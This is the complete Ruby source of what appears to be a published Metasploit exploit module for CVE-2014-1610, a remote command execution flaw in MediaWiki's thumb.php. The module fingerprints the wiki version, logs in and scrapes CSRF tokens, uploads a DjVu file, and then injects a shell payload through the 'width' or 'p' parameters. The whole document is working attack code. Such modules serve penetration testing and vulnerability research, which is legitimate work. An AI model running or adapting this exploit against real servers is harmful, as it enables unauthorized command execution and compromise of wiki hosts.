MediaWiki Thumb.php Remote Command Execution

`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'MediaWiki Thumb.php Remote Command Execution',  
'Description' => %q{  
MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,  
when DjVu or PDF file upload support is enabled, allows remote unauthenticated  
users to execute arbitrary commands via shell metacharacters. If no target file  
is specified this module will attempt to log in with the provided credentials to  
upload a file (.DjVu) to use for exploitation.  
},  
'Author' =>  
[  
'Netanel Rubin', # from Check Point - Discovery  
'Brandon Perry', # Metasploit Module  
'Ben Harris', # Metasploit Module  
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2014-1610' ],  
[ 'OSVDB', '102630'],  
[ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ],  
[ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ]  
],  
'Privileged' => false,  
'Targets' =>  
[  
[ 'Automatic PHP-CLI',  
{  
'Payload' =>  
{  
'BadChars' => "\r\n",  
'PrependEncoder' => "php -r \"",  
'AppendEncoder' => "\""  
},  
'Platform' => ['php'],  
'Arch' => ARCH_PHP  
}  
],  
[ 'Linux CMD',  
{  
'Payload' =>  
{  
'BadChars' => "",  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'generic perl python php',  
}  
},  
'Platform' => ['unix'],  
'Arch' => ARCH_CMD  
}  
],  
[ 'Windows CMD',  
{  
'Payload' =>  
{  
'BadChars' => "",  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'generic perl',  
}  
},  
'Platform' => ['win'],  
'Arch' => ARCH_CMD  
}  
]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Jan 28 2014'))  
  
register_options(  
[  
OptString.new('TARGETURI', [ true, "Base MediaWiki path", '/mediawiki' ]),  
OptString.new('FILENAME', [ false, "Target DjVu/PDF file (e.g target.djvu target.pdf)", nil ]),  
OptString.new('USERNAME', [ false, "Username to authenticate with", '' ]),  
OptString.new('PASSWORD', [ false, "Password to authenticate with", '' ])  
], self.class)  
end  
  
def get_version(body)  
meta_generator = get_html_value(body, 'meta', 'generator', 'content')  
  
unless meta_generator  
vprint_status("No META Generator tag on #{full_uri}.")  
return nil, nil, nil  
end  
  
if meta_generator && meta_generator =~ /mediawiki/i  
vprint_status("#{meta_generator} detected.")  
meta_generator =~ /(\d)\.(\d+)[\.A-z]+(\d+)/  
major = $1.to_i  
minor = $2.to_i  
patch = $3.to_i  
vprint_status("Major:#{major} Minor:#{minor} Patch:#{patch}")  
  
return major, minor, patch  
end  
  
return nil, nil, nil  
end  
  
def check  
uri = target_uri.path  
  
opts = { 'uri' => normalize_uri(uri, 'index.php') }  
  
response = send_request_cgi!(opts)  
  
if opts['redirect_uri']  
vprint_status("Redirected to #{opts['redirect_uri']}.")  
end  
  
unless response  
vprint_status("No response from #{full_uri}.")  
return CheckCode::Unknown  
end  
  
# Mediawiki will give a 404 for unknown pages but still have a body  
if response.code == 200 || response.code == 404  
vprint_status("#{response.code} response received...")  
  
major, minor, patch = get_version(response.body)  
  
unless major  
return CheckCode::Unknown  
end  
  
if major == 1 && (minor < 8 || minor > 22)  
return CheckCode::Safe  
elsif major == 1 && (minor == 22 && patch > 1)  
return CheckCode::Safe  
elsif major == 1 && (minor == 21 && patch > 4)  
return CheckCode::Safe  
elsif major == 1 && (minor == 19 && patch > 10)  
return CheckCode::Safe  
elsif major == 1  
return CheckCode::Appears  
else  
return CheckCode::Safe  
end  
end  
  
vprint_status("Received response code #{response.code} from #{full_uri}")  
CheckCode::Unknown  
end  
  
def exploit  
uri = target_uri.path  
  
print_status("Grabbing version and login CSRF token...")  
response = send_request_cgi({  
'uri' => normalize_uri(uri, 'index.php'),  
'vars_get' => { 'title' => 'Special:UserLogin' }  
})  
  
unless response  
fail_with(Failure::NotFound, "Failed to retrieve webpage.")  
end  
  
server = response['Server']  
if server && target.name =~ /automatic/i && server =~ /win32/i  
vprint_status("Windows platform detected: #{server}.")  
my_platform = Msf::Module::Platform::Windows  
elsif server && target.name =~ /automatic/i  
vprint_status("Nix platform detected: #{server}.")  
my_platform = Msf::Module::Platform::Unix  
else  
my_platform = target.platform.platforms.first  
end  
  
# If we have already identified a DjVu/PDF file on the server trigger  
# the exploit  
unless datastore['FILENAME'].blank?  
payload_request(uri, datastore['FILENAME'], my_platform)  
return  
end  
  
username = datastore['USERNAME']  
password = datastore['PASSWORD']  
  
major, minor, patch = get_version(response.body)  
  
# Upload CSRF added in v1.18.2  
# http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1  
if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1))  
upload_csrf = false  
elsif ((major == 1) && (minor < 18))  
upload_csrf = false  
else  
upload_csrf = true  
end  
  
session_cookie = response.get_cookies  
  
wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')  
  
if wp_login_token.blank?  
fail_with(Failure::UnexpectedReply, "Couldn't find login token. Is URI set correctly?")  
else  
print_good("Retrieved login CSRF token.")  
end  
  
print_status("Attempting to login...")  
login = send_request_cgi({  
'uri' => normalize_uri(uri, 'index.php'),  
'method' => 'POST',  
'vars_get' => {  
'title' => 'Special:UserLogin',  
'action' => 'submitlogin',  
'type' => 'login'  
},  
'cookie' => session_cookie,  
'vars_post' => {  
'wpName' => username,  
'wpPassword' => password,  
'wpLoginAttempt' => 'Log in',  
'wpLoginToken' => wp_login_token  
}  
})  
  
if login and login.code == 302  
print_good("Log in successful.")  
else  
fail_with(Failure::NoAccess, "Failed to log in.")  
end  
  
auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')  
  
# Testing v1.15.1 it looks like it has session fixation  
# vulnerability so we dont get a new session cookie after  
# authenticating. Therefore we need to include our old cookie.  
unless auth_cookie.include? 'session='  
auth_cookie << session_cookie  
end  
  
print_status("Getting upload CSRF token...") if upload_csrf  
upload_file = send_request_cgi({  
'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),  
'cookie' => auth_cookie  
})  
  
unless upload_file and upload_file.code == 200  
fail_with(Failure::NotFound, "Failed to access file upload page.")  
end  
  
wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf  
wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')  
title = get_html_value(upload_file.body, 'input', 'title', 'value')  
  
if upload_csrf && wp_edit_token.blank?  
fail_with(Failure::UnexpectedReply, "Couldn't find upload token. Is URI set correctly?")  
elsif upload_csrf  
print_good("Retrieved upload CSRF token.")  
end  
  
upload_mime = Rex::MIME::Message.new  
  
djvu_file = ::File.read(::File.join(Msf::Config.data_directory, "exploits", "cve-2014-1610", "metasploit.djvu"))  
file_name = "#{rand_text_alpha(4)}.djvu"  
  
upload_mime.add_part(djvu_file, "application/octet-stream", "binary", "form-data; name=\"wpUploadFile\"; filename=\"#{file_name}\"")  
upload_mime.add_part("#{file_name}", nil, nil, "form-data; name=\"wpDestFile\"")  
upload_mime.add_part("#{rand_text_alpha(4)}", nil, nil, "form-data; name=\"wpUploadDescription\"")  
upload_mime.add_part("", nil, nil, "form-data; name=\"wpLicense\"")  
upload_mime.add_part("1",nil,nil, "form-data; name=\"wpIgnoreWarning\"")  
upload_mime.add_part(wp_edit_token, nil, nil, "form-data; name=\"wpEditToken\"") if upload_csrf  
upload_mime.add_part(title, nil, nil, "form-data; name=\"title\"")  
upload_mime.add_part("1", nil, nil, "form-data; name=\"wpDestFileWarningAck\"")  
upload_mime.add_part(wp_upload, nil, nil, "form-data; name=\"wpUpload\"")  
post_data = upload_mime.to_s  
  
print_status("Uploading DjVu file #{file_name}...")  
  
upload = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),  
'data' => post_data,  
'ctype' => "multipart/form-data; boundary=#{upload_mime.bound}",  
'cookie' => auth_cookie  
})  
  
if upload and upload.code == 302 and upload.headers['Location']  
location = upload.headers['Location']  
print_good("File uploaded to #{location}")  
else  
if upload.body.include? 'not a permitted file type'  
fail_with(Failure::NotVulnerable, "Wiki is not configured for target files.")  
else  
fail_with(Failure::UnexpectedReply, "Failed to upload file.")  
end  
end  
  
payload_request(uri, file_name, my_platform)  
end  
  
def payload_request(uri, file_name, my_platform)  
if my_platform == Msf::Module::Platform::Windows  
trigger = "1)&(#{payload.encoded})&"  
else  
trigger = "1;#{payload.encoded};"  
end  
  
vars_get = { 'f' => file_name }  
if file_name.include? '.pdf'  
vars_get['width'] = trigger  
elsif file_name.include? '.djvu'  
vars_get['width'] = 1  
vars_get['p'] = trigger  
else  
fail_with(Failure::BadConfig, "Unsupported file extension: #{file_name}")  
end  
  
print_status("Sending payload request...")  
r = send_request_cgi({  
'uri' => normalize_uri(uri, 'thumb.php'),  
'vars_get' => vars_get  
}, 1)  
  
if r && r.code == 404 && r.body =~ /not exist/  
print_error("File: #{file_name} does not exist.")  
elsif r  
print_error("Received response #{r.code}, exploit probably failed.")  
end  
end  
  
# The order of name, value keeps shifting so regex is painful.  
# Cant use nokogiri due to security issues  
# Cant use REXML directly as its not strict XHTML  
# So we do a filthy mixture of regex and REXML  
def get_html_value(html, type, name, value)  
return nil unless html  
return nil unless type  
return nil unless name  
return nil unless value  
  
found = nil  
html.each_line do |line|  
if line =~ /(<#{type}[^\/]*name="#{name}".*?\/>)/i  
found = $&  
break  
end  
end  
  
if found  
doc = REXML::Document.new found  
return doc.root.attributes[value]  
end  
  
''  
end  
end  
  
`